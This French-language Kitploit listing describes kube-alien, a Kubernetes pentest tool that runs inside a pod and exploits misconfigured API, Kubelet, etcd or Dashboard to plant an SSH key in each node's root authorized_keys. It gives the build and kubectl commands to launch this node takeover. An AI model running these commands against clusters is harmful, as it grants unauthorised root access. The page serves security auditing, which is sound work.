Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
kube-alien — Outil automatisé de test d'intrusion de cluster Kubernetes qui exploite les défauts de configuration dans l'API, Kubelet, etcd et Dashboard pour réaliser une prise de contrôle de nœud via injection de clé SSH depuis l'intérieur d'un pod. | Kitploit
Outils/GitHubGitHub/nixwizard/kube-alien
Sécurité des ConteneursExploitationTests d'IntrusionSécurité CloudMauvaise Configuration
GitHubnixwizard/kube-alien

kube-alien

Outil automatisé de test d'intrusion de cluster Kubernetes qui exploite les défauts de configuration dans l'API, Kubelet, etcd et Dashboard pour réaliser une prise de contrôle de nœud via injection de clé SSH depuis l'intérieur d'un pod.

Voir le dépôt
252il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Kube-alien

Cet outil lance une attaque sur un cluster k8s depuis l'intérieur. Cela signifie que vous devez déjà avoir un accès avec les autorisations nécessaires pour déployer des pods dans un cluster afin de l'exécuter. Après avoir exécuté le pod kube-alien, il tente de prendre le contrôle des nœuds du cluster en ajoutant votre clé publique au fichier /root/.ssh/authorized_keys du nœud en utilisant l'image https://github.com/nixwizard/dockercloud-authorizedkeys (peut être ajustée avec le paramètre ADD_AUTHKEYS_IMAGE dans config.py) issue de docker/dockercloud-authorizedkeys. L'attaque réussit s'il y a une mauvaise configuration dans l'un des composants du cluster ; elle exploite les vecteurs suivants :

  • API Kubernetes
  • service Kubelet
  • service Etcd
  • Kubernetes-Dashboard

Quel est le but de cet outil ?

  • Lors d'un audit de sécurité d'un cluster k8s, on peut rapidement évaluer sa posture de sécurité.
  • Démonstration partielle de l'exploitation des vecteurs d'attaque mentionnés.

Comment un cluster k8s peut-il être attaqué depuis l'intérieur dans la vie réelle ?

  • Vulnérabilité RCE ou SSRF dans une application qui s'exécute dans l'un des pods de votre cluster.

Utilisation

L'image Kube-alien doit être poussée vers votre dockerhub (ou autre registre) avant d'utiliser cet outil.

root@kitploit:~
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien

La variable d'environnement AUTHORIZED_KEYS doit être définie avec la valeur de votre clé publique SSH ; en cas de succès, la clé publique sera ajoutée au fichier authorized_keys de l'utilisateur root de chaque nœud.

root@kitploit:~
kubectl run --image=YOUR_DOCKERHUB_ACCOUNT/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

ou vous pouvez utiliser mon image pour un test rapide :

root@kitploit:~
kubectl run --image=nixwizard/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

Consultez les logs du pod Kube-alien pour voir si l'attaque a réussi :

root@kitploit:~
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d' ')

Les ressources suivantes m'ont beaucoup aidé à créer cet outil

  • https://www.youtube.com/watch?v=vTgQLzeBfRU
  • https://www.youtube.com/watch?v=dxKpCO2dAy8 (and other awesome posts on kubernetes attack surface at https://raesene.github.io)
  • https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
Télécharger l’outil